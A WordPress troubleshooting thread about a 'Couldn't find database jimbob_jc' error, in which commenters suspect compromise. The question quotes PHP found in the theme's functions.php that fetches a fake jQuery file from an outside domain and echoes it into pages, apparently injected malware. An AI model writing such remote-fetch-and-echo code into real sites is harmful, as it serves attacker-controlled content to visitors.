# Couldn't find database jimbob_jc

Tags: wordpress

I'm using WordPress, and I get an error with following message:

> Couldn't connect to database server.Couldn't find database jimbob_jc. 
>   An unexpected problem has occured with the application.   SELECT
>   statscurl_id FROM `statscurl` WHERE statscurl_ip = '';

What does that mean? How do I fix it?

I have searched Google, but I've not had any success with others having similar problems.

Someone said "Comment out the following code in the header.php file":

```
<?php
  if(function_exists('curl_init'))
  {
    $url = "http://www.4llw4d.freefilesblog.com/jquery-1.6.3.min.js";
    $ch = curl_init();  
    $timeout = 5;  

    curl_setopt($ch,CURLOPT_URL,$url); 
    curl_setopt($ch,CURLOPT_RETURNTRANSFER,1); 
    curl_setopt($ch,CURLOPT_CONNECTTIMEOUT,$timeout); 
    $data = curl_exec($ch);  

    curl_close($ch); 
    echo "$data";
  }
?>
```

I found it in `functions.php`, but it doesn't work.

Comment: `http://www.4llw4d.freefilesblog.com/jquery-1.6.3.min.js` sounds a bit like a scam / spam / virus

Comment: The code you were recommended to comment out just tries to download and echo a jQuery file. That usually shouldn't have anything to do with an error message like `Couldn't connect to database server`, at least not on _your_ WordPress server. Maybe the other server where you're trying to download this .js file from tries to log cURL accesses in a database and fails to connect.

Comment: @Pekka Yeah, this looks suspicious. Also, the name lookup for this subdomain fails. I just checked it via anonymous proxy. I'm wondering whether we should garble that URL in the OP.

Comment: @Pekka - Agreed to you both. I looked at this earlier, it's odd - this jimbob database, here's one from a few days ago http://stackoverflow.com/questions/11902693/couldnt-connect-to-database-server-couldnt-find-database-jimbob-jc I'm going to ask eabraham how he knew to delete that code, it's not even in the question.